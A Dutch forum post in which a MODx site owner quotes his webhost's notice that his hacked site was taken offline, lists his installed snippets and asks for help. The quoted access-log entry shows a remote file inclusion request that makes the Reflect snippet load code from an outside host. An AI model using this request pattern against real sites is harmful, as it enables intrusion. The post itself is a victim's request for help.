Beste MODx gebruikers,
Ik keek vandaag in mijn mail en heb het volgende bericht van mijn webhost ontvangen.
Heeft iemand anders dit ook gehad, en zoja wat moet ik doen?
Ik heb voor de veiligheid even mijn website hieronder hernoemt naar MIJNSITE:
Heden middag hebben wij uw account MIJNSITE.nl offline gehaald daar er via onveilige php code hacks zijn geplaatst onder uw account. Onder andere een psybnc, eggdrop en andere ongewenste binaries. U zult begrijpen dat wij direct actie dienen te ondernemen op dergelijke hacks.
Onderstaand vind u zowel het pad waar 1 van deze hacks geplaatst was en een entry uit onze logfile met betrekking tot de hack. Gelieve actie hierop te ondernemen en eventuele updates door te voeren in uw cms of site. Zodra u hier actie op heeft ondernomen gelieve dit aan te geven zodat wij u weer terug online kunnen zetten.
pad:
/public_html/MIJNSITE/assets/.dat
entry:
www.MIJNSITE.nl 213.207.40.33 - - [31/Jan/2009:16:49:29 +0100] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http%3A%2F%2Fwww.freewebs.com%2Felbasc%2Fix.txt%3F%3F%3F&act=img&img=sort_asc HTTP/1.1" 200 97 "http://www.MIJNSITE.nl//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.freewebs.com/elbasc/ix.txt???" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
Ik heb de volgende snippets geïnstalleerd:
AjaxSearch
Breadcrumbs
Wayfinder
eForm
MaxiGallery
Jot
SiteMap
SimpleCounter
Search_Highlight
Verder geen speciale instellingen vreemde chunks, plugins en templates.
Kan iemand mij svp uitleggen wat hier mis gegaan is?? Ik vermoed zelf dat het gastenboek (Jot) de boosdoener is, aangezien ik hier al eerder meerdere malen spam op heb ontvangen (door een bot waarschijnlijk).
Mvg,
Michael
